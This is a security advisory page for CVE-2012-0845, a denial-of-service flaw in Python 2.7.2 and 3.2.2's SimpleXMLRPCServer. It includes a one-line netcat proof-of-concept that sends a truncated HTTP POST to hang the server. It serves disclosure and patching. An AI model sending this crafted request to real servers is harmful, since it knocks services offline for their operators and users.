Contact Us
SECURITY BLOG SECURITY DASHBOARD PARTNERS PRODUCTS JOBS SERVICES COMPANY HOME
Network Security Consulting Advisories Article

Python SimpleXMLRPCServer Denial Of Service Vulnerability

http://www.securityfocus.com/bid/51996

Security Info

Bugtraq ID: 51996
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2012-0845
Remote: Yes
Local: No
Published: Feb 14 2012 12:00AM
Updated: May 02 2012 05:01PM
Credit: Dan Callaghan
Vulnerable: Red Hat Fedora 17
Python Software Foundation Python 3.2.2
Python Software Foundation Python 2.7.2
Not Vulnerable:

Security Discussion

Python is prone to a denial-of-service vulnerability.

An attacker can exploit this issue by sending specially crafted HTTP POST request.

Successful exploits will allow attackers to cause a denial-of-service condition.

Python versions 2.7.2 and 3.2.2 are vulnerable; other versions may also be affected.

Proof of Concept and Security Exploits

An attacker can use readily available tools to exploit this issue.

The following exploit is available:

$ echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345

Security Solution(s)

Solution:
Updates are available. Please see the references for more information.

Security References(s)

References:

Contact Us

Security Penetration Testing

Security Questions

Security Dashboard

Emagined Security Blog featuring Dr. Eugene Schultz
Site Updated October 31, 2014
©2000-2014 Emagined Security
All Rights Reserved

Secure Web Programming
by Vizual Services